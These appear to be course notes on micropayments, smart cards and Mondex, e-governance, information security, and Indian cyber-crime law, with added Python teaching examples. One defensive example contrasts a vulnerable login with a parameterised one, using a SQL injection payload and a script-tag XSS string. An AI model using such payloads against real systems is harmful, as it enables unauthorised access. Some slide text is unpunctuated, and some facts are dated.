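The scheme just described accumulates many tiny payments and settles them as one larger payment. PayWord, listed earlier under micropayment methods, does this with a hash chain instead of a central wallet: the customer commits to the root of a chain once, each payment reveals the next preimage, and the vendor verifies payments with hashing alone and redeems only the last one. The Python program below is an added example of that mechanism, written for these notes and not taken from the PayWord paper or any product; the signed commitment that binds the root to the customer and vendor is abstracted away (the vendor is simply handed w_0), and the chain length, unit price and parties are constructed.

```python
import hashlib
import secrets

# Constructed example of a PayWord-style hash chain. The signed commitment that
# binds w_0 to a customer, vendor and expiry is abstracted: the vendor is simply
# handed w_0. A real deployment signs (vendor, w_0, expiry) with the customer's
# key, the same kind of digital signature described in the eCheck material.


def _h(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


class Customer:
    """Builds a chain w_n (random) -> w_{n-1} = H(w_n) -> ... -> w_0 = H(w_1)."""

    def __init__(self, n_paywords: int) -> None:
        chain = [b""] * (n_paywords + 1)
        chain[n_paywords] = secrets.token_bytes(32)
        for i in range(n_paywords - 1, -1, -1):
            chain[i] = _h(chain[i + 1])
        self._chain = chain
        self.root = chain[0]          # w_0: the commitment given to the vendor
        self._next = 1                # index of the next unspent payword

    def pay(self, units: int = 1):
        """Spend `units` paywords at once; returns (index, payword) for the vendor."""
        index = self._next + units - 1
        if units < 1 or index >= len(self._chain):
            raise ValueError("not enough paywords left in the chain")
        self._next = index + 1
        return index, self._chain[index]


class Vendor:
    """Verifies paywords with hashing only: no per-payment signature or bank call."""

    def __init__(self, root: bytes, unit_cents: int) -> None:
        self._last_word = root
        self._last_index = 0
        self.unit_cents = unit_cents

    def accept(self, index: int, word: bytes) -> bool:
        steps = index - self._last_index
        if steps <= 0:                # replay or out-of-order payword
            return False
        w = word
        for _ in range(steps):        # hash forward to the last accepted payword
            w = _h(w)
        if w != self._last_word:      # does not chain back: forged or wrong chain
            return False
        self._last_word, self._last_index = word, index
        return True

    def amount_due_cents(self) -> int:
        """Settled once, later, by presenting the highest accepted (index, word)."""
        return self._last_index * self.unit_cents


if __name__ == "__main__":
    customer = Customer(n_paywords=100)
    vendor = Vendor(customer.root, unit_cents=1)
    print(vendor.accept(*customer.pay()))        # True: one cent for one article
    print(vendor.accept(*customer.pay(3)))       # True: three cents at once
    print(vendor.accept(1, customer._chain[1]))  # False: replaying an old payword
    print(vendor.amount_due_cents())             # 4
```

Because only the highest (index, word) pair is ever redeemed, the per-payment cost is one hash on each side, which is what makes sub-cent pricing viable; the security of the whole chain rests on the random w_n staying secret and on the one-way property of the hash.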

Advantages and risks –

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason micropayments are applicable for businesses where even small costs for every single transaction would be inefficient. The main benefits for the customer in using micropayments are speed and flexibility. From the merchants' side, speed and acceptable transaction fees are very important. As the transactions involve small amounts of capital, security does not have the highest priority. Much more important than security is trust: users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before seeing a return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.

Payment options –

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer gets an option (or options) for how to pay for the desired content or goods.

The most common micropayment options are listed below:

- Call2pay: payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.
- Handypay: payment via mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment.
- Ebank2pay: payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN. After making payment, the customer receives access to the purchased product.
- Credit card: payment by credit card. The customer enters his credit card data and confirms the transaction. The transactions can optionally be carried out with the 3-D Secure™ method (Verified by VISA™ and MasterCard SecureCode™).
- Direct debit: payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal account and allows transactions of less than US$12 to take place. The service is, as of 2013, offered in select currencies only.

Micropayment Uses –

Publishing

Marketing

Software

Entertainment

Web Services

SMART CARD

A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with

embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but

sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene

styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable

financial smart cards made from paper

Smart cards can provide identification authentication data storage and application

processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)

within large organizations

A smart card is any pocket-sized card with embedded integrated circuits which can

process data

This implies that it can receive input which is processed and delivered as an output

What is Smart Card

Standard credit card-sized with microchip embedded on it

Two types

Memory-only chips

Microprocessor chips

Can hold up to 32000 bytes

Newer smart cards have math co-processors

PREPARED BY ARUN PRATAP SINGH 34

34

Perform complex encryption routines quickly

In 1968 German inventors patented the combination of a plastic card with a microchip.

Construction of smart cards (diagram not reproduced)

Why smart cards?

Improve the convenience and security of any transaction

Provide tamper-resistant storage of user and account identity

Provide vital components of system security

Help protect against a wide range of security threats

Advantages:

Flexibility

Security

Portability

Increasing data storage capacity

Reliability

Schematic overview of a smart card (diagram not reproduced)

Smart card processing (diagram not reproduced)

Smart card applications:

Ticketless travel

Seoul bus system: 4 million cards, 1 billion transactions since 1996

Planned for the SF Bay Area transit system

Authentication / ID

Medical records

E-cash

Store loyalty programs

Personal profiles

Government

Licenses

Mall parking

Example: Mondex

OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK, to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

Direct transfer of electronic money between two cards

Transfer of electronic money over the Internet or telephone networks etc

Keep transaction records

Password protection and "lock card" functions

Portable balance finder to check balance

Support multiple currencies


ADVANTAGES

Consumer:

Convenience

Accessibility

On chip record of recent transactions

Home load

Internet purchases

Merchant:

Reliable offline payment

Higher security

Low transaction cost

Reduced cash handling

Financial institution:

Strengthen customer relationships

New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payments). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, on the initiative of NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe, and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex protect privacy?

Principles protected:

- limits for collecting personal information
- limits for using, disclosing and keeping personal information
- keeping personal information accurate
- safeguarding personal information


Limits for collecting personal information:

- loads from account
- deposits into account
- lost transactions

Limits for using, disclosing and keeping personal information:

- to safeguard deposits
- to reimburse for non-performance

Keeping personal information accurate:

- load and unload are online
- a rolling log of the last 10 transactions provides the exact spend and retailer name

Safeguarding personal information:

- firewalls in MULTOS between applications (ITSEC E6 designation)
- transaction data passed to the retailer is deliberately limited
- individual transaction data is not collected by banks: Mondex is an unaudited system


The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then use the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995, two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication with the bank is required for each transaction. Mondex cards, however, contain an embedded microprocessor with sophisticated encryption methods and tamper-resistant hardware designed to protect them from attackers. The ability of the Mondex smart card to do offline transactions means it is less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they are actually recorded in the memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM, or as soon as the retailer uploads transaction data to the bank's computer.

A significant disadvantage of Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted, and customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you lose a Mondex smart card: losing a Mondex card is just like losing a wallet full of cash. With a credit card you're protected against any loss exceeding $50; this protection is not currently available with a Mondex smart card.

According to Mondex, the smart card system is fully auditable: there is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex cannot claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of the limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud. While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes its electronic payment system is secure, and is convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.
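The two properties the text keeps returning to, offline card-to-card transfer with no bank in the loop and a bounded on-card transaction log that overflows, can be modelled in a few lines. The Python below is an added example and is not Mondex or MULTOS code. A `Purse` holds its value on the card itself, `transfer` moves value between two purses with every check performed before either purse is changed, and each purse keeps a rolling log of its last ten transactions (the capacity of ten is the one the page quotes; the card ids, balances and amounts are constructed). Once a card has done more than ten transactions the oldest records are overwritten, and `unrecoverable_count` reports how many a bank reading the card later can no longer retrieve, which is exactly the auditing gap the critics describe.

```python
from collections import deque
from dataclasses import dataclass, field

LOG_CAPACITY = 10   # the "rolling 10 transactions" the text describes


@dataclass
class Purse:
    """Stored-value card: the balance lives on the chip, not in a bank ledger."""
    card_id: str
    balance: int                 # value in minor units (pence) to avoid float rounding
    locked: bool = False         # the "lock card" function
    seq: int = 0                 # running count of every transaction this card has done
    log: deque = field(default_factory=lambda: deque(maxlen=LOG_CAPACITY))

    def _record(self, direction: str, peer: str, amount: int) -> None:
        self.seq += 1
        # deque(maxlen=...) silently drops the oldest entry once full: this is the
        # overflow behaviour that the critics quoted above object to.
        self.log.append((self.seq, direction, peer, amount))


def transfer(payer: Purse, payee: Purse, amount: int) -> None:
    """Card-to-card value transfer with no bank in the loop.

    Every check runs before either purse is mutated, so a rejected transfer
    leaves both balances and both logs exactly as they were.
    """
    if payer.locked:
        raise PermissionError(f"{payer.card_id} is locked")
    if amount <= 0:
        raise ValueError("amount must be positive")
    if payer.balance < amount:
        raise ValueError("insufficient value on card")
    payer.balance -= amount
    payee.balance += amount
    payer._record("debit", payee.card_id, amount)
    payee._record("credit", payer.card_id, amount)


def unrecoverable_count(purse: Purse) -> int:
    """How many of this card's transactions the bank can no longer retrieve."""
    return max(0, purse.seq - len(purse.log))


def demo():
    """Constructed scenario: twelve 1.50 purchases from one card at one retailer."""
    alice = Purse("card-A", balance=5000)
    shop = Purse("card-S", balance=0)
    for _ in range(12):
        transfer(alice, shop, 150)
    return alice, shop


if __name__ == "__main__":
    a, s = demo()
    print(f"{a.card_id}: balance {a.balance}p, log holds {len(a.log)} of {a.seq} "
          f"transactions, {unrecoverable_count(a)} unrecoverable")
```

The log entries carry the counterparty's card id and the amount, which is the "exact spend and retailer name" mentioned earlier; what the model makes visible is that after the eleventh transaction the first one is gone from the card for good, so any fraud detection that relies on reading cards back has a blind spot that grows with use between uploads.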

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define the term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance, or electronic governance. The word "electronic" in the term e-governance implies technology-driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, and integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back-office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally, four basic models are available: government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance:

Both terms are often treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration, combined with organizational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with taking this as a definition of e-governance is that it makes no provision for the governance of the ICTs themselves. In fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capability, with all the expertise and opinion-shaping processes among the various social stakeholders that this entails. So the perspective of e-governance is the use of technologies that both help in governing and themselves have to be governed. Public-Private Partnership (PPP) based e-governance projects have been hugely successful in India; United Telecoms Limited (UTL) is a major player in India in PPP based e-governance projects, each of which involved a mammoth state-wide area network.

E-governance is the future that many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended for the desired individual have actually reached him or her. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on the unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government and enhance citizens' economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE


A suggested architecture for e-Governance is shown in the diagram (not reproduced here), which illustrates that applications from various departments can be integrated so as to be accessible from any terminal or computer in any other department, or from anywhere through the network. This is possible because of the characteristics of CORBA: it is location transparent, language independent, implementation independent and operating system independent. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit the CORBA specifications, new Web applications, or even a database environment such as Oracle. Seamless interconnection, and thereby effective utility of the entire e-Governance system, is possible if the middleware is designed to provide the necessary services such as transactions, database management, messaging and naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos protocol and the Generic Security Service API (GSS-API). While those technologies carry most of the weight within CORBA, public-key security with the Secure Sockets Layer (SSL) is popular for Internet-based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, and vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.


G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. a service centre, an unattended kiosk, or from one's home/workplace) and how to interact with the government (e.g. through Internet, fax, telephone, e-mail, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here, e-Governance tools are used to aid the business community, the providers of goods and services, to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. G2B initiatives can be transactional, such as licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment for businesses, enabling them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand, and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B): refers to the conducting of transactions between government bodies and businesses via the Internet.

Business to government (B2G): professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

- Agreement between Government and the Private Sector for the provision of a public good or service by the latter
- Generally, but not always, involving:
  - long term contracts
  - user charges and/or payments flowing between the parties
  - shared investments, but mainly private
  - risk sharing by the parties
- Must be a partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves the objectives of the individual partners.

Why do them?

- Fiscal head room
- As a way of financing the project
- Separate policy & regulation from operations
- Make the good or service available
- Pay for performance and output
- Introduce competition, for and in the market


The need to set the right priorities:

Four Basic Dimensions of P3

Although each is unique, all P3s include four basic characteristics:

Shared goals

Shared resources (time money expertise people)

Shared risks

Shared benefits

Benefits

Expedited project completion

Project cost savings

Improved quality

Use of private resources

Access to new sources of private capital

Two Major Steps


Crafting the Partnership

Implementing the Partnership

Project management:

Six Distinct Phases

Genesis

What's the need?

What's driving the need (the rationale)?

Facility non-compliance, natural disaster, budget deficit

Is there a need for a Public/Private Partnership?


Preliminary Project Definition

Feasibility

Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?

Market Research

EconomicFinancial Analysis

Program Budget and Schedule

Risk Analysis

Plan and Test

Final project definition

What is the best way to complete the project

Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?

Master ScheduleBudget

Political Climate

Any potential "fatal flaws" that could derail the project?

Procurement and Contracting

How do you choose and contract with the best-value private partner?

What's the best delivery method?

Design-Bid-Build

Design-Build

Finance-Design-Build

What do current statutes allow

Procurement Approach

Sole source, RFP, low bid

Risk Allocation between Public and private Partners

Structuring of contract: risks and rewards


Implement

Environmental

Design

Permitting

Construction

Commissioning and Administration

Operate

Startup

Monitoring

Assessment

Enhancement

Contract Modifications

Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest the efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index also tend to have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries, with the top three scores on the readiness index, all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will depend heavily on the trust they have in the data security of the service.

2. INFORMATION SECURITY

A central challenge of e-Government services is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

- understanding an organization's information security requirements and the need to establish a policy and objectives for information security;
- implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;
- monitoring and reviewing the performance and effectiveness of the ISMS;
- continual improvement based on objective measurement.

Data security rests on a set of security requirements:

- Authentication: the capability to identify who is using the services (a person or a software program); the process of verifying that you are who you say you are.
- Authorization: the capability to grant rights of access to resources; the process of verifying that someone has the right to do what he or she is trying to do.
- Confidentiality: the capability to prevent unauthorized access to information.
- Integrity: the capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.
- Traceability: the capability to chronologically relate any transaction to the person or system that performed the action, in a way that is verifiable.
- Non-repudiation: the capability to prevent a person or system that took part in an event or action from denying or challenging their participation in it.
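Of the requirements above, integrity and traceability are the ones an e-Government back office can show in code: every action on a citizen's record must be attributable to an actor, ordered in time, and protected against later editing. The following Python example is added here and is not from the page or from any government system. It keeps an append-only audit trail in which each entry carries an HMAC over its own fields together with the MAC of the previous entry, so editing a field, deleting an entry or reordering entries is detected when the trail is verified. The key, the actor names, the timestamps and the "deed" resource are constructed for the example. Non-repudiation in the strict sense would additionally require per-actor asymmetric signatures, because anyone holding the shared MAC key (here the verifier itself) could forge an entry.

```python
import hashlib
import hmac
import json

# Assumed for the example: in a deployment the key lives in an HSM or KMS and is
# never in source. A fixed value here only keeps the example runnable offline.
LOG_KEY = b"example-only-key-do-not-use"
GENESIS = "0" * 64     # "previous MAC" for the very first entry


class AuditTrail:
    """Append-only log; each entry is MACed together with the MAC of its predecessor."""

    def __init__(self, key: bytes = LOG_KEY):
        self._key = key
        self.entries = []

    def _mac(self, body: dict) -> str:
        # Canonical JSON (sorted keys, no whitespace) so the same fields always
        # MAC to the same value regardless of dict ordering.
        payload = json.dumps(body, sort_keys=True, separators=(",", ":")).encode()
        return hmac.new(self._key, payload, hashlib.sha256).hexdigest()

    def append(self, ts: str, actor: str, action: str, resource: str) -> dict:
        """Record who did what to which resource, chained to the prior entry."""
        prev = self.entries[-1]["mac"] if self.entries else GENESIS
        body = {"seq": len(self.entries) + 1, "ts": ts, "actor": actor,
                "action": action, "resource": resource, "prev": prev}
        entry = dict(body, mac=self._mac(body))
        self.entries.append(entry)
        return entry

    def verify(self):
        """Return (True, None) if the trail is intact, else (False, seq of first bad entry)."""
        prev = GENESIS
        for expected_seq, entry in enumerate(self.entries, start=1):
            body = {k: v for k, v in entry.items() if k != "mac"}
            if (entry["seq"] != expected_seq                                  # deletion/reordering
                    or entry["prev"] != prev                                  # chain broken
                    or not hmac.compare_digest(self._mac(body), entry["mac"])):  # field edited
                return False, entry["seq"]
            prev = entry["mac"]
        return True, None


def build_sample_trail() -> AuditTrail:
    """Constructed entries for a fictitious land-records service."""
    trail = AuditTrail()
    trail.append("2024-01-10T09:00:00Z", "clerk-17", "read", "deed/4471")
    trail.append("2024-01-10T09:02:30Z", "clerk-17", "update", "deed/4471")
    trail.append("2024-01-10T09:05:00Z", "auditor-2", "read", "deed/4471")
    return trail


if __name__ == "__main__":
    t = build_sample_trail()
    print("intact:", t.verify())
    t.entries[1]["actor"] = "clerk-99"      # someone rewrites who made the update
    print("after tampering:", t.verify())
```

The verifier reports the first entry that fails, which is what an incident responder needs: everything before it can still be trusted, everything from that point on must be reconstructed from other sources.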

Examples of organizational and technical measures to prevent unauthorized access and processing:

- Protecting premises, equipment and systems software, including input/output units
- Protecting software applications used to process personal data
- Preventing unauthorized access to personal data during transmission, including transmission via telecommunication means and networks
- Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data
- Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and by whom, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data

Although trusted security and privacy measures constitute a crucial success factor for e-Government, this has not yet been adequately addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administrations and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples exist of cyber attacks using techniques like packet sniffers, probes, malware, Internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

- achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis;
- maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness;
- continually improve its control environment;
- effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable to them. One research work found 816 e-Government websites from 212 different countries to be vulnerable to Cross-Site Scripting (XSS) and Structured Query Language (SQL) injection. An SQL injection attack can compromise data integrity (and, by reading arbitrary tables, confidentiality), while XSS is a vulnerability that attackers may exploit to steal users' information, such as session cookies.
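The two vulnerability classes named above can be shown side by side in a few lines. The Python example below is added here; it is not code from the cited research or from any e-Government portal, and it uses an in-memory SQLite table with constructed rows. `login_vulnerable` builds its query by string formatting, so a crafted password turns the WHERE clause into a tautology and logs the attacker in as the first matching citizen; `login_hardened` binds the same inputs as parameters and rejects the payload. `greeting_vulnerable` echoes a stored display name into HTML unescaped, which is how a stored XSS payload reaches other users' browsers, while `greeting_hardened` escapes on output. The table stores passwords in clear only so the injection stays readable; a real system stores salted password hashes.

```python
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory table with constructed rows (no real citizens, no real passwords)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE citizens (username TEXT, password TEXT, display_name TEXT)")
    conn.executemany(
        "INSERT INTO citizens VALUES (?, ?, ?)",
        [("asha", "s3cret", "Asha"), ("ravi", "pa55word", "Ravi")],
    )
    return conn


def login_vulnerable(conn, username: str, password: str):
    # VULNERABLE: user input is pasted into the SQL text, so a password such as
    #   x' OR '1'='1
    # becomes ... AND password = 'x' OR '1'='1' and every row matches.
    sql = (f"SELECT display_name FROM citizens "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchone()


def login_hardened(conn, username: str, password: str):
    # HARDENED: bound parameters travel as data; the driver never parses them as SQL.
    sql = "SELECT display_name FROM citizens WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def greeting_vulnerable(display_name: str) -> str:
    # VULNERABLE: a name containing markup is rendered as markup (stored/reflected XSS).
    return f"<p>Welcome, {display_name}</p>"


def greeting_hardened(display_name: str) -> str:
    # HARDENED: escape on output so <, >, &, and quotes reach the browser as text.
    return f"<p>Welcome, {html.escape(display_name, quote=True)}</p>"


if __name__ == "__main__":
    db = make_db()
    payload = "x' OR '1'='1"
    print("vulnerable login:", login_vulnerable(db, "asha", payload))   # a row: logged in without the password
    print("hardened login:  ", login_hardened(db, "asha", payload))     # None: rejected
    print(greeting_vulnerable("<script>alert(1)</script>"))
    print(greeting_hardened("<script>alert(1)</script>"))
```

Parameter binding and output escaping are the two fixes the cited survey's findings call for; neither requires a framework, only the discipline of never letting untrusted input cross from the data position into the code position of a query or a page.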

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained in cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order, or any unjust or shameful act. 'Offence' is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage, or information warfare and related activities.

Pornography, threatening e-mail, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber squatting is the act of registering a famous domain name and then selling it for a fortune. This is an issue that has not been tackled in the IT Act 2000.

Phishing

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited e-mails by customers of financial institutions requesting them to enter their username, password or other personal information to access their account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber stalking is the use of the Internet or other electronic means to stalk someone. The term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services. Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base:

- 121 million Internet users
- 65 million active Internet users, up 28% from 51 million in 2010
- 50 million users shop online on e-commerce and online shopping sites
- 46+ million social network users
- 346 million mobile users had subscribed to data packages


CYBER LAW

Section 66 (IT Act 2000, as originally enacted) - Hacking with computer system

(1) Whoever with the intent to cause, or knowing that he is likely to cause, wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Section 43

Whoever, without permission of the owner of the computer:

- secures access to the computer, computer system or computer network;
- downloads, copies or extracts any data, computer database or any information;
- introduces or causes to be introduced any virus or contaminant;
